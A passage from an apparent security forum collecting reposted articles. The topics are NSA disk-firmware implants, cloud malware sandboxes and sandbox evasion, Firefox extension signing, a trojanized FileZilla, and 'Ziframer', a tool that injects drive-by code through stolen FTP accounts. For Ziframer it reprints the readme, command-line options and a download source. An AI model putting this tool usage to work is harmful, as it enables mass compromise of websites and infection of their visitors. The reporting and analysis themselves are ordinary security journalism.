unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal. This is particularly useful if the the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they’re unencrypted and save them to this hidden area on the machine that doesn’t get encrypted. There isn’t much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption. “Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area,” Raiu says. Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls “"customs opportunities,” and extract the password from this hidden area to unlock the encrypted disk. Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications. “[The owners] only use it in some very specific cases where there is no other way around it,” Raiu says. “Think about Bin Laden who lived in the desert in an isolated compound—doesn’t have internet and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific.” Raiu thinks, however, that the attackers have a grander scheme in mind. “In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs.” They wouldn’t need the password if they could copy an entire directory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data. So the attackers would need a bigger hidden space for storage. Luckily for them, it exists. There are large sectors in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. This service area, also called the reserved are or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space. An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted “not only that these areas can’t be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools.” Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage. To write or copy data to service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, “y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible,” Berkman writes. It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail. One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this sector but there’s only 80 MB, it’s a dead giveaway that something is there that shouldn’t be. But a leaked NSA document that was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem. NSA Interns to the Rescue The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the “Covert Storage” project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk. “The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space,” the document reads. “It would report this size back to the operating system and not provide any way to access the additional space.” Only one partition of the drive would be visible on the partition table, leaving the other partitions—where the hidden data was stored—invisible and inaccessible. The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command. How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought. But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out. Sursa:How the NSA's Firmware Hacking Works and Why It's So Unsettling | WIRED
  13. In this section, we’re providing a list of cloud automated online malware analysis tools that are not available anymore due to the website being offline or the service being disrupted by the creators of the analysis environment. Aerie : https://aerie.cs.berkeley.edu CWSandbox : The Sandbox | Understanding CyberForensics ThreatTrack : http://www.treattrack.com Malbox : Malbox System VisualThreat : http://www.visualthreat.com XecScan : http://scan.xecure-lab.com Norman Sandbox : https://www.norman.com/analysis Despite quite a few analysis tools being unavailable, there are still a lot of them being actively supported and developed. The online malware analysis tools that are still present on the Internet are presented below. Each of the tools has a letter written in square brackets, which is used later on to present each of the tools in a table in order to preserve space and provide clearer results. Each of the tools also has an URL address of where the service is available in case you want to submit different files for analysis. [A] Anubis : http://anubis.iseclab.org [C] Comodo : http://camas.comodo.com [D] Document Analyzer : http://www.document-analyzer.net [E] Eureka : http://eureka.cyber-ta.org [J] Joe Sandbox : http://www.joesecurity.org [M] Malwr : https://malwr.com/submission [MS] Mobile Sandbox : http://mobilesandbox.org [TE] Threat Expert : http://www.threatexpert.com/submit.aspx [TT] Threat Track : http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx [V] Vicheck : https://www.vicheck.ca [X] Xandora : http://www.xandora.net/xangui Note that there are other cloud malware analysis platforms, but we didn’t take them info consideration in this article. Therefore, some of them are not presented and described below. Supported file formats and document types Since malware can be hidden in almost any file format or document type, malware analysis tools must provide support for such formats or document types in order to be able to detect the threat inside it. For example: if an attacker has hidden a malicious payload inside a PDF document, the malware analysis tool must have PDF support to be able to manipulate with PDF documents. If PDF support is not present, the dissection of PDF document will not be possible, and consequentially the tool will not be able to find malicious payload. If we look at the PDF document through the eyes of a malware analyst tool, the PDF document is just a set of random bytes. The attackers mostly use the file formats, document types and other elements presented below for including malicious payloads. The majority of presented elements need no further introduction, since they are used in our every day lives, but we will still provide a brief explanation of each of them. exe: Windows PE executable files normally used for Windows executable programs. elf: Linux ELF executable files normally used for Linux executable programs. mach-o: MAC OS X Mach-O executable files normally used for Mac executable programs. apk: Android APK executable files url: URLs pdf: PDF documents doc/docx: DOC/DOCX documents ppt/pptx: PPT/PPTX documents xsl/xsls: XSL/XSLS documents htm/html: HTM/HTML web pages jar: JAR Java executable files rtf: RTF documents dll: DLL libraries db: DB database files png/jpg: PNG/JPG images zip/rar: ZIP/RAR archived cpl: Control Panel Applets ie: Analyze Internet Explorer process when opening an URL ps1: Powershell scripts python : Python scripts vbs: VBScript files The table below presents supported file formats and document types of each cloud automated malware analysis service. The rows represent file formats or document types, while the columns are used for each of the automated malware analysis tools presented by one or two letters (as presented before). The ?is used to denote that certain file format or document type is supported by an automated malware analysis service, while an empty cell indicates otherwise. The * is used to mark that the support for document type is being implemented, but not yet available, at the time of this writing. Table 1: supported document types by different malware analysis tools Document Type A C D E J M MS TE TT V X exe ? ? ? ? ? ? ? elf * mach-o ? apk ? ? ? url ? ? pdf ? ? ? ? doc/docx ? ? ? ? ppt/pptx ? ? ? xsl/xsls ? ? ? ? rtf ? htm/html ? ? jar ? ? dll ? ? db ? png/jpg ? zip/rar ? ? cpl ? ie ? ps1 ? python ? vbs ? I’ve spent quite some time putting together the table above, which summarized the supported file formats, document types and other kind of elements that can be analyzed in automated fashion. From the table, we can quickly determine that there isn’t a service that can be used to analyze any kind of file, which is because the malicious code is included in files and documents in a profoundly different manner. When adding a malicious code in executable file, we can do so by including malicious assembly instructions in its .text file section – and that is only one of the ways of doing it. On the other hand, when including a malicious code in a .docx document, we usually include it in a form of a malicious macro, which will get executed by Microsoft Word upon opening the document. Below we’ve presented different categories of categorizing the file formats, document types and other elements presented in the table above. In each of the categories we’ll also briefly discuss how the malicious code gets executed and what is needed for cloud automated malware analysis of such code. Executable Files [exe, elf, mach-o, apk, dll]: a malicious executable file is distributed around the Internet, which is downloaded by users in the form of cracked software programs and cracked games. The users download a program believing to be something they want, which it is, but an additional code is usually appended to the file containing a malicious payload that gets executed on the user’s computer and therefore infecting it. Documents [pdf, doc/docx, ppt/pptx, xsl/xsls, rtf]: vulnerabilities are discovered in different software programs on a daily basis. Therefore, if an attackers finds a vulnerability in an Acrobat Reader (supports pdf file format), Microsoft Word/OpenOffice (supports doc/docx, ppt/pptx, xsl/xslx, rtf), it can form such a document that the program won’t be able to process the file, but will crash instead. Depending on the type of vulnerability, an attacker can possibly execute a malicious payload included in the document. Web browser [url, htm/html, jar, ie]: web browsers also contain vulnerabilities as PDF Reader and Office Suite do. Therefore, an attacker can create a malicious website the web browser will not able to handle, which will lead to the web browser crashing, during which an attacker can execute arbitrary code. Archives [zip/rar]: archives can be used to distribute malicious files around the Internet. If a malicious file is put inside a password protected archive, the usual analysis solutions won’t be able to take a look inside the archive and determine whether it contains malicious files. Images [png/jpg]: an attacker can hide a malicious payload inside an image, which can be processed by a vulnerable web application running on an incorrectly setup web server. Therefore, an analysis solution should be able to parse various image file formats in order to parse images to determine whether they contain anything out of the ordinary, like a malicious payload. Code (python, vbs, ps1) : an attacker can also distribute malicious code written in appropriate programming/scripting language, which is later processed by some application on the victim’s machine. An example of such is PowerShell (ps1) macro included in a Word document, which gets executed on a user’s request when allowing the execution of macros upon opening a malicious .docx document in Microsoft Word. Techniques for Detecting Automated Environments Various techniques exist for detecting automated malware analysis environments, which are being incorporated in malware samples. When malware binaries are using different checks to determine whether they are executing in a controlled environment, they usually don’t execute malicious actions upon environment detection. The picture below presents an overview of malware and techniques it can use to detect if it’s being executed in an automated environment. In order to make the picture clearer, we’ll describe the process in detail. Once the malware has infected the system, it can be running in user or kernel-mode, depending upon the exploitation techniques. Usually malware is running in user-mode, but there are multiple techniques for malware to gain additional privileges to execute in kernel-mode. Despite malware being executed in either user or kernel-mode, there are multiple techniques malware can use to detect if it’s being executed in automated malware analysis environment. At the highest level, the techniques are divided into the following categories: Detect a Debugger: debuggers are mostly used when a malware analyst is manually inspecting a malware sample in order to gain understanding of what it does. Debuggers are not frequently used in automated malware analysis, but different techniques can still be incorporated into the malware sample to make debugging the malware sample more difficult. Anti-Disassembly Tricks: this category isn’t directly related to automated malware analysis environments, but when an analyst is manually reviewing the malware sample in a debugger, malware can use different techniques to confuse disassembly engines into producing incorrect disassembled code. This is only useful when a malware analyst is analyzing the malware sample manually, but doesn’t have much impact in automated malware analysis environments. Detect a Sandbox Environment: a sandbox is an environment separate from the main operating system where malware samples can be run without causing any harm to the rest of the system. The primary purpose of sandbox environment is to emulate different parts of the system, or the whole system to separate the guest system from the host system. Depending on the virtualization layer, there are different types of sandboxes, which are presented below. Virtualized Programs: Chromium Sandbox, Sandboxie Linux Containers: LXC, Docker Virtualized Environment: VirtualPC, VMware, VirtualBox, QEMU Each automated malware analysis tool uses different backend systems to run the malware in a controlled environment. Malware can be run in physical machines or virtual machines. Note that old unused physical machines lying around at home would be a perfect candidate for setting up a malware analysis lab, which would make it considerably more difficult for malware binaries to determine whether they are being executed in a controlled environment. When building our own malware analysis lab, we have to connect multiple machines together to form a network, which can be done simply by virtual or physical switch, depending on the type of machines used. Each cloud automated malware analysis services uses some kind of virtualization environment to run their malware samples, like Qemu/KVM, VirtualBox, VMWare, etc. According to the virtualization technology being used, a malware sample can use different techniques to detect that it’s being analyzed and terminate immediately. Thus the malware sample will not be flagged as malicious, since it terminated preemptively without execution the malicious code. In this section we’ve seen that different cloud malware analysis services use different virtualization technologies to run submitted malware samples. As far as I know, only Joe Sandbox has an option of running malware samples on actual physical machines, which prevents certain techniques from being used in malware samples to detect if they are being run in an automated malware analysis environment. Still, there are many other techniques a malware can use to detect if it’s being analyzed. This is a cat and mouse game, where new detection techniques are invented and used by malware samples on a daily basis. On the other hand, there are numerous anti-detection techniques used to prevent the malware from determining it’s being executed in an automated malware analysis environment. When a new detection technique appears, usually a new anti-detection technique is put together to render the detection technique useless. Conclusion In this article we’ve presented the differences between multiple cloud malware analysis services that can be used to analyze different file formats and document types. Each service supports only a fraction of all file formats and document types in which malicious code can be injected. Therefore, depending on the file we have to analyze, we can use the services that support its corresponding file format or document type. In order to analyze a document, we have to choose the appropriate service in order to do so. Since there are many techniques an attacker can use to determine whether the malicious payload is being executed in an automated malware analysis environment, some malicious samples won’t be analyzed correctly, resulting in false positives. Therefore, such services should only be used together with a reverse engineer or malware analyst in order to manually determine whether the file is malicious or not. Since there are many malicious samples distributed around the Internet on a daily basis, every sample cannot be manually inspected, which is why cloud automated malware analysis services are a great way to speed up the analysis. Source
  14. In an effort to head off the problem of malicious or misbehaving browser add-ons, Mozilla is planning to require developers to have their Firefox extensions signed by the company in the near future. As much of users’ computing has moved into their browsers in the last few years, extensions and add-ons have become important tools. There are an untold number of useful extensions for most of the major browsers, but there are also are plenty of malicious ones. Attackers have been known to insert extensions into browser Web stores or other download sites in order to steal users’ data or perform other malicious actions. There also are all kinds of somewhat legitimate extensions that may collect more data than they disclose to users or perform unwanted actions. To defeat this problem, Google requires developers to distribute their extensions through the Chrome Web store. However, Mozilla officials said they didn’t want to take that approach. “We’re responsible for our add-ons ecosystem and we can’t sit idle as our users suffer due to bad add-ons. An easy solution would be to force all developers to distribute their extensions through AMO, like what Google does for Chrome extensions. However, we believe that forcing all installs through our distribution channel is an unnecessary constraint. To keep this balance, we have come up with extension signing, which will give us better oversight on the add-ons ecosystem while not forcing AMO to be the only add-on distribution channel,” Jorge Villalobos of Mozilla said in a blog post. The idea is that sometime in the second quarter, Mozilla will begin requiring developers to submit their extensions and add-ons to AMO, the company’s main distribution channel for those apps. Each submission will go through a review process to ensure that it doesn’t exhibit any malicious or undocumented behavior. If the developer plans to host her extension on AMO and it passes the check, Mozilla will automatically sign it. If the developer plans to host the extension elsewhere, it will go through the same process and be sent back signed if it passes muster. The change will mean that after a transition period of about three months, users won’t be able to install any unsigned extensions on either the Release or Beta versions of Firefox. Villalobos said the company plans to begin displaying warnings about unsigned extensions in Firefox 39. This move by Mozilla will give users more confidence in the extensions and add-ons they’re installing. “Extensions that change the homepage and search settings without user consent have become very common, just like extensions that inject advertisements into Web pages or even inject malicious scripts into social media sites. To combat this, we created a set of add-on guidelines all add-on makers must follow, and we have been enforcing them via blocklisting (remote disabling of misbehaving extensions). However, extensions that violate these guidelines are distributed almost exclusively outside of AMO and tracking them all down has become increasingly impractical. Furthermore, malicious developers have devised ways to make their extensions harder to discover and harder to blocklist, making our jobs more difficult,” Villalobos said. Source
  15. Threat Level: High Severity: High CVSS Severity Score: 7.0 Impact Type: Complete confidentiality, integrity and availability violation. [2] Vulnerability: (1) Filtration Bypass. (3) Unauthenticated Cross Site scripting vulnerabilities. Description A malicious user could get unsuspecting visitors into divulging their credentials, to force a redirection to a heterogeneous third-party website, or to execute malicious code, on behalf of the attacker. An attacker can also fold malicious content into the content being delivered to visitors on the site. In this attack “Visitor -> Vendor” trust-levels are directly impacted, since the vendor’s website, and associated services , and products have high levels of trust by default. Read more: http://dl.packetstormsecurity.net/1501-advisories/Oracle_Website_Vulnerabilities119.pdf
  16. PeStudio is a unique tool that performs the static analysis of 32-bit and 64-bit Windows executable. Malicious executable attempts to hide its malicious intents and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of PeStudio is to detect these anomalies, provide indicators and score the executable being analyzed. Since the executable file being analyzed is never started, you can inspect any unknown or malicious executable with no risk. Download: http://www.winitor.com/tools/PeStudio846.zip
  17. PEStudio is a unique tool that performs the static investigation of 32-bit and 64-bit executable. PEStudio is free for private non-commercial use only. Malicious executable often attempts to hide its malicious behavior and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of PEStudio is to detect these anomalies, provide Indicators and score the Trust for the executable being analyzed. Since the executable file being analyzed is never started, you can inspect any unknown or malicious executable with no risk. Download: Index of /tools
  18. Malware code can be very small, and the impact can be very severe! The Antivirus firm AVAST spotted a malicious version of the open source FTP (File Transfer Protocol) software 'FileZilla' out in the wild. The software is open source, but has been modified by the hackers that steal users' credentials, offered on various hacked sites for download with banner or text ads. Once installed, the software's appearance and functionalities are equal to the original version, so a user cannot distinguish between the fake or real one, and the malware version of the “.exe” file is just slightly smaller than the real one. "The installed malware FTP client looks like the official version and it is fully functional! You can’t find any suspicious behavior, entries in the system registry, communication or changes in application GUI." The only difference is that the malware version use 2.46.3-Unicode and the official installer use v2.45-Unicode, as shown: "We found a hardcoded connection detail stealer after deeper analysis. Malware authors abuse open source code and add their own stealer function to the main code." The modified version copies the login information of the user and sends it to a server that is apparently in Germany, and same IP address of the server hosts three other domains, which are also associated with malware and spam activities. "Login details are sent to attackers from the ongoing FTP connection only once. Malware doesn't search bookmarks or send any other files or saved connections," Avast explains. This malicious version has been compiled way back in September 2012, and is still detected by just a couple of Antivirus solutions. In the past, Cyber Criminals also used Google Adsense to promote malicious software or the modified open source softwares. Be Careful when downloading the FileZilla FTP client, such malware could also be employed for spreading more malware. Users are recommended to downloaded the softwares from the official website only. Source: Warning: Malicious version of FTP Software FileZilla stealing users' Credentials - The Hacker News Nota personala: Oricum FileZilla e cel mai ratat client ftp. Chiar si pentru conexiunile SSL/TLS, el stocheaza parolele in plain text. Au fost gramada de tickete puse la ei si se pare ca nu considera ca e ceva grav. Referinta: http://trac.filezilla-project.org/ticket/5530 status changed from new to closed priority changed from critical to normal resolution set to rejected .... Pe trac filezilla: Eu va recomand sa nu-l mai descarcati deloc.
  19. An Iframer is a script which is used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the Iframer automaticly puts an Drive-by infection on the specified html, php or asp files. In this case the Iframer is a PHP-script which is used to spread a variant of ZeuS (aka Zbot/WSNPoem). The Iframer is called “Ziframer” and is sold for 30$. The PHP script can bee launched via command line or accessed using a web browser: The script is very simple and just needs a list of FTP accounts which the script should check. As you can see on the screenshot above, the input file (ftp.txt) currently contains more then 18’000 stolen FTP credentials: In the file “iframe.txt” the attacker can define the (JavaScript- or HTML-) code he would like to inject: The cyberciminal has also the possibility to set a timeout, a file where the script will report invalid FTP credentials (bad.txt) and a file which will collect valid FTP credentials (good.txt). The screenshot below shows you the script while working through the list of stolen FTP credentials (ftp.txt): Last but not least the attacker has to define where he wants to put the malicious code. He has the following options: start page – Inject the code at the top of the page end – Inject the code at the bottom of the page change – Replace a text or a string in the page with the malicious code check – Check if the malicious code is already on the page Now the cybercriminal has just to press the “START” button to run the script. The Iframer script will now get through the FTP accounts and inject the malicious code which is defined in the file “iframe.txt” (see this one). To make the use of the script more user friendly, the script has a readme file which describes the usage of the script in russian and english. Content of readme.html (english): This script is designed to test the FTP accounts on the validity, insert the code into files on the FTP. [Features] [*] Console and Web interface [*] Stabilno runs under Windows and Nix BSD [*] Check for validity ftp [*] Paste the Code (at the beginning or end of file. Or a full overwrite the file to your text – defeys) [*] Strange Komentirovanie iframe’ov [*] Convenience logs [*] All akki (valid \ invalid) remain in the database. [*] The names of files, to insert the code can be set regExp’om, such as index \ .(.*)[_ b] or [_b ](.*). php | html | asp | htm. [*] It takes on all the folders on the site. [*] Function update replaces your old code to the new (for example, changed the addresses fryma) [Run] [!] Recommend to use the console interface Windows Open a console (Start-> Run-> cmd) Write to the path to php.exe for example c: \ php \ php.exe then write the path to the script (zifr.php) For example the so-c: \ php \ php.exe D: \ soft \ ziframer \ zifr.php the script will run and display a certificate. * NIX Open the console / ssh Write to php then write the path to the script (zifr.php) For example the so-php / home / user / soft / ziframer / zifr.php the script will run and display a certificate. [Options] -file -f Path to the file to your FTP -code -c path to a file with code introduced -inject -i Where vstavlt code three options start – top of the page end – in the bottom of the page change – replace the text in the page code -time -t Timeout for connecting to the FTP -del -d With this option chyuzhye ifremy komentiruyutsya -update -u Update your code with this option, the script ishet inserted your code and replaces it with a new -good -g file where badat skladyvatsya working FTP -bad -b file where badat skladyvatsya not working FTP -hide -h If you enable this option, your code will not markerovatsya but you will not be able to use the function update -restore -r Continue from the last FTP if you had not had time to do the whole list you can start from where you stopped Conclusion The Ziframe script is very simple an cheap. Even a n00b is able to use it. It also demonstrates how efficiently and easily cybercriminals can distribute their malicious code to tremendous numbers of stolen FTP accounts. Automated mechanisms like this one shows how infection vectors are more and more shifted from E-mails with malicious attachments to Drive-by. The modular approach allows the cybercriminal to feed the script with different lists of compromised accounts that can be acquired on the underground market. Download Source fuckav.ru
×
×
  • Create New...